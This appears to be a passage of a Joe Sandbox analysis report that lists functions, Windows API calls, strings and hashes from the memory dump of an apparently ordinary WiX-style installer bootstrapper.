API String ID: 2213243845-1270936966
Opcode ID: 79496fe5ab014ffe60edd38b36b538c9030c0818a700f8843181e84c66717cca
Instruction ID: dd59620653b1ef49cc13ad7c04936eda719de76b1632175f232e2ecfb3f91ab7
Opcode Fuzzy Hash: 79496fe5ab014ffe60edd38b36b538c9030c0818a700f8843181e84c66717cca
Instruction Fuzzy Hash: 53416371900725ABCB119FA9C888EAEBBF8AF45710F0545A6FD05EB311D775DE008BB1

Function 000D0D1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,000B8BD8), ref: 000D0D77
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000B8BD8,00000000), ref: 000D0D99
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,000B8BD8,00000000,00000000,00000000), ref: 000D0DF1

Strings

regutil.cpp, xrefs: 000D0DC1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: 36dc94ff813ed13921ab891ddd83d204b6fd2656b8e32b332b242c8c0737773d
Instruction ID: 0e28f557f0e7046123948179eda312d5e78f5138ebb4d4d21a241f92e73a9b67
Opcode Fuzzy Hash: 36dc94ff813ed13921ab891ddd83d204b6fd2656b8e32b332b242c8c0737773d
Instruction Fuzzy Hash: 9A3150B6A01229FFEB218A998D44BBBB7ADEF04750F114166BD08E7250D7359E10DAB0

Function 000D78C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

SysFreeString.OLEAUT32(00000000), ref: 000D79AA
SysFreeString.OLEAUT32(?), ref: 000D79B5
SysFreeString.OLEAUT32(00000000), ref: 000D79C0

Strings

atomutil.cpp, xrefs: 000D78F2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: atomutil.cpp
API String ID: 2724874077-4059165915
Opcode ID: f3ef39fa2f90f92eb730cb48037d5332031011e1fb61a63c6d1b508dcb8af40d
Instruction ID: f7bdd09e4cec61485e8667303becf442393784ec181e761fc624db32fda3452b
Opcode Fuzzy Hash: f3ef39fa2f90f92eb730cb48037d5332031011e1fb61a63c6d1b508dcb8af40d
Instruction Fuzzy Hash: D1318673D05329BBDB129BA4CC55AAEF7A8AF44710F0141A6EA04AB351E771DD009BB0

Function 000B88CF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,000B8C14,00000000,00000000), ref: 000B898C

Strings

Failed to initialize package from related bundle id: %ls, xrefs: 000B8972
Failed to open uninstall key for potential related bundle: %ls, xrefs: 000B88FB
Failed to ensure there is space for related bundles., xrefs: 000B893F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: b72ee182aff2745fc69ea26f0e555d1ab31835b747ddb9f51c072be63c4503a9
Instruction ID: 07c5d8cf8a12e7cad27216cd6107a4104db157c139f169482476d16bd30022a6
Opcode Fuzzy Hash: b72ee182aff2745fc69ea26f0e555d1ab31835b747ddb9f51c072be63c4503a9
Instruction Fuzzy Hash: B521743294025AFBDF229E94CC06BFEBB7DEB00711F188159F90066161DB719E20EB91

Function 00093A97 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000010,00000000,80004005,00000000,00000000,00000100,?,00091472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000913B7), ref: 00093AB2
HeapReAlloc.KERNEL32(00000000,?,00091472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000913B7,000001C7,00000100,?,80004005,00000000), ref: 00093AB9

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

Part of subcall function 00093B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B59
Part of subcall function 00093B51: HeapSize.KERNEL32(00000000,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B60

_memcpy_s.LIBCMT ref: 00093B04

Strings

memutil.cpp, xrefs: 00093B45

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: 0f7832ebe07423fa2da92c98bf43ad33c9fcd2ac4d08eadcf0c4be78ede4a6aa
Instruction ID: 960dbaaad77e1557e6ecf32c937bdac072fda474e8bf816d82962471248bcb44
Opcode Fuzzy Hash: 0f7832ebe07423fa2da92c98bf43ad33c9fcd2ac4d08eadcf0c4be78ede4a6aa
Instruction Fuzzy Hash: F311E131602228AFDF212A689C55EAF3B99DF44760B014215FA254B292C771CF50BAA0

Function 000A3955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,000A3E61,feclient.dll,?,00000000,?,?,?,00094A0C), ref: 000A39F1

Part of subcall function 000D0F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000D0FE4
Part of subcall function 000D0F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000D101F

Strings

SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 000A3966
feclient.dll, xrefs: 000A395A
Logging, xrefs: 000A3983

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 938f2316dd41b84d4c86ba92e047536ffc169e557975027666a94c909a31f526
Instruction ID: 44d1bdb64784ebf65a4f1538cd673cb9b23f95cb590f7c6bd43faba67601ab83
Opcode Fuzzy Hash: 938f2316dd41b84d4c86ba92e047536ffc169e557975027666a94c909a31f526
Instruction Fuzzy Hash: 4911B233B40308BBDB219AD5CD47AEFBBB8EB02B41F504066F505AB150D6B29F81D760

Function 000D0658 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,000CFF0B,?,?,00000000,00000000,0000FDE9), ref: 000D066A
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,?,?,000CFF0B,?,?,00000000,00000000,0000FDE9), ref: 000D06A6
GetLastError.KERNEL32(?,?,000CFF0B,?,?,00000000,00000000,0000FDE9), ref: 000D06B0

Strings

logutil.cpp, xrefs: 000D06E0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 82feded0ec76c833c2dba06434fd4e16670ff4c5ca40973cc206020694213f43
Instruction ID: 26d9f194030b328dfa7b302dd40763023122237c50bad131a3137a73f37020d5
Opcode Fuzzy Hash: 82feded0ec76c833c2dba06434fd4e16670ff4c5ca40973cc206020694213f43
Instruction Fuzzy Hash: E411C672A01325ABD7209A6ADC44EEFBBACEB85760F014216FD09D7240D634DD10D6F0

Function 00091209 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00095137,00000000,?), ref: 00091247
GetLastError.KERNEL32(?,?,?,00095137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00091251

Strings

ignored , xrefs: 00091216
apputil.cpp, xrefs: 00091272

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: 388e1e57ffd8fe1182db766929f1103e726917a11d3b36702183f8df1c2e402d
Instruction ID: 9b2f8a2f77fb20f4392df3c015bdc248e1619631032d958cb568c9bbe06d8978
Opcode Fuzzy Hash: 388e1e57ffd8fe1182db766929f1103e726917a11d3b36702183f8df1c2e402d
Instruction Fuzzy Hash: 4D118F71A00229FB9F21EB99C805DEFBBE8EF44750B01415AFD04E7211E7309E10AAA0

Function 000BCF56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,000BD1DC,00000000,00000000,00000000,?), ref: 000BCF66
ReleaseMutex.KERNEL32(?,?,000BD1DC,00000000,00000000,00000000,?), ref: 000BCFED

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

Strings

Failed to allocate memory for message data, xrefs: 000BCFB5
NetFxChainer.cpp, xrefs: 000BCFAB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: 3065647cb797d9f28c69f86eb1dc32cb976c3e9638390c6488fad9cbf32c4936
Instruction ID: 412493433e02435ea9d5bea3a43008624dc5091d2874f07de9647994ebcb1494
Opcode Fuzzy Hash: 3065647cb797d9f28c69f86eb1dc32cb976c3e9638390c6488fad9cbf32c4936
Instruction Fuzzy Hash: 531182B5300216EFDB15DF28D855EAABBA5FF09720F104179F9149B7A2C731AC10CBA4

Function 00091F78 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000011FF,00095386,?,00000000,00000000,00000000,?,80070656,?,?,?,000AE50B,00000000,00095386,00000000,80070656), ref: 00091FAA
GetLastError.KERNEL32(?,?,?,000AE50B,00000000,00095386,00000000,80070656,?,?,000A3F6B,00095386,?,80070656,00000001,crypt32.dll), ref: 00091FB7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,000AE50B,00000000,00095386,00000000,80070656,?,?,000A3F6B,00095386), ref: 00091FFE

Strings

strutil.cpp, xrefs: 00091FDB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: fc068a2ebfc2b6f13ceb4a8e5f3b93939dc45c363b82182538b4ebf42fcf1876
Instruction ID: 89b1b30b15adc5f7a94a7ec26b8b966c4a7f85e6c3b7a532b96cab8db69a22d4
Opcode Fuzzy Hash: fc068a2ebfc2b6f13ceb4a8e5f3b93939dc45c363b82182538b4ebf42fcf1876
Instruction Fuzzy Hash: B1115276A01229FBEF159F94CC09AEE7AA8EF08340F01416ABD11A2150E7754E10DBE0

Function 000AFC51 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 000AFC58

Strings

Failed to allocate new BootstrapperEngineForApplication object., xrefs: 000AFC8E
EngineForApplication.cpp, xrefs: 000AFC84
Failed to QI for IBootstrapperEngine from BootstrapperEngineForApplication object., xrefs: 000AFCB0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: EngineForApplication.cpp$Failed to QI for IBootstrapperEngine from BootstrapperEngineForApplication object.$Failed to allocate new BootstrapperEngineForApplication object.
API String ID: 0-1509993410
Opcode ID: 432e741a418331ba926ef0488d33baaf4cc23eee658c41528747066cafac6297
Instruction ID: b17542a6ad0e50842a3d8881128b158a8c1d4709cd3f4b6e570a3c56fd58e4fa
Opcode Fuzzy Hash: 432e741a418331ba926ef0488d33baaf4cc23eee658c41528747066cafac6297
Instruction Fuzzy Hash: FEF0D636244757BFC71226E6DC06EEF7758CF86770B11002AFD08AE291EB6199019565

Function 000D4C67 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000DB4F0,40000000,00000001,00000000,00000002,00000080,00000000,000A0328,00000000,?,0009F37F,?,00000080,000DB4F0,00000000), ref: 000D4C7F
GetLastError.KERNEL32(?,0009F37F,?,00000080,000DB4F0,00000000,?,000A0328,?,00000094,?,?,?,?,?,00000000), ref: 000D4C8C
CloseHandle.KERNEL32(00000000,00000000,?,0009F37F,?,0009F37F,?,00000080,000DB4F0,00000000,?,000A0328,?,00000094), ref: 000D4CE0

Strings

fileutil.cpp, xrefs: 000D4CB0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: 64d8031c3fa10cb16d286ac59f8a67e86ff22d66cb147a8df9ebbbaefca1d99d
Instruction ID: 7a2d07d86f15a3fd35ca70370521ded0d25d32801ccc5fd99386f6b39ddfec5c
Opcode Fuzzy Hash: 64d8031c3fa10cb16d286ac59f8a67e86ff22d66cb147a8df9ebbbaefca1d99d
Instruction Fuzzy Hash: 9E01A732712324A7EB715EA99C05F9B3A95DB41BB0F124222FE24AB2E0C731CC1197B0

Function 000D4840 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,000B8A30,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 000D4874
GetLastError.KERNEL32(?,000B8A30,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 000D4881

Strings

fileutil.cpp, xrefs: 000D4855, 000D48A5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: 403f5bb61d00e98c12f200a31c1f6e4286d590c51f328e78bfcdd0fca5691c49
Instruction ID: e69b6fde7cb7b28736d9d82b421add3e17c20c1dca03f039dd1e911e4e61f0a4
Opcode Fuzzy Hash: 403f5bb61d00e98c12f200a31c1f6e4286d590c51f328e78bfcdd0fca5691c49
Instruction Fuzzy Hash: 6C01D632641320B7F73026A4AC49FBF7A98DB40BA1F114222FE15AB6D0CA794D0066F0

Function 000B69A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(000B68BA,00000001,?,00000001,00000000,?,?,?,?,?,?,000B68BA,00000000), ref: 000B69D0
GetLastError.KERNEL32(?,?,?,?,?,?,000B68BA,00000000), ref: 000B69DA

Strings

msuengine.cpp, xrefs: 000B69FE
Failed to stop wusa service., xrefs: 000B6A08

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuengine.cpp
API String ID: 4114567744-2259829683
Opcode ID: ea0e145dccbab9f30d5aa760f6fb4779592ade76ff9fb9f5d564dd57e7638de9
Instruction ID: 3080e428f396a14568390acfd1429074ed22ab2fde45dd44b0d7fc441b76d112
Opcode Fuzzy Hash: ea0e145dccbab9f30d5aa760f6fb4779592ade76ff9fb9f5d564dd57e7638de9
Instruction Fuzzy Hash: 0301DB72B40324ABEB10ABB5AC05BEBB7E8DF49710F01412AFD04FB180EA249D0586E5

Function 000AEA72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 000AEA9A
GetLastError.KERNEL32 ref: 000AEAA4

Strings

Failed to post elevate message., xrefs: 000AEAD2
EngineForApplication.cpp, xrefs: 000AEAC8

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 85cd252a1992361690918eb261ee5a9601f5891553fda24c09693873632709c5
Instruction ID: 7ce8c7b062447319b99e7a18e108a734986af6f251b39cbb6659fcdc8c461ce1
Opcode Fuzzy Hash: 85cd252a1992361690918eb261ee5a9601f5891553fda24c09693873632709c5
Instruction Fuzzy Hash: 90F0F036704370ABE7206AA99C09B9777C4EF05760F11422ABE28FA1D1D7259C0186E5

Function 0009D7CF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0009D7F6
FreeLibrary.KERNEL32(?,?,000947D1,00000000,?,?,00095386,?,?), ref: 0009D805
GetLastError.KERNEL32(?,000947D1,00000000,?,?,00095386,?,?), ref: 0009D80F

Strings

BootstrapperApplicationDestroy, xrefs: 0009D7EE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: 6861b6e6ab03d9f3be917cfc449e3506eea061c57ecc21ff5bde042493e2908c
Instruction ID: 7c8ea074ff6018cf27dac98d0dcf6d28d3f74d4649e65f9bc5205beb162006ba
Opcode Fuzzy Hash: 6861b6e6ab03d9f3be917cfc449e3506eea061c57ecc21ff5bde042493e2908c
Instruction Fuzzy Hash: CDF049362407019FEB205FA6DC08A67B7E9BF80362B01C53FE966C6520DB35E800DB70

Function 000D3C58 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,^S,?,00000000,0009535E,?,?,?), ref: 000D3C7F
CoCreateInstance.OLE32(00000000,00000000,00000001,000F6F3C,?), ref: 000D3C97

Strings

Microsoft.Update.AutoUpdate, xrefs: 000D3C7A
^S, xrefs: 000D3C6F, 000D3C76, 000D3C79

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate$^S
API String ID: 2151042543-696383982
Opcode ID: 09fb0bf70477103967594cf31249025bd4a33def78c2c2817d7abeb02aea4dee
Instruction ID: 7690726ac44fc8fbe8300d0c01595af164f862564e14c5d764978fb4d7ba09d5
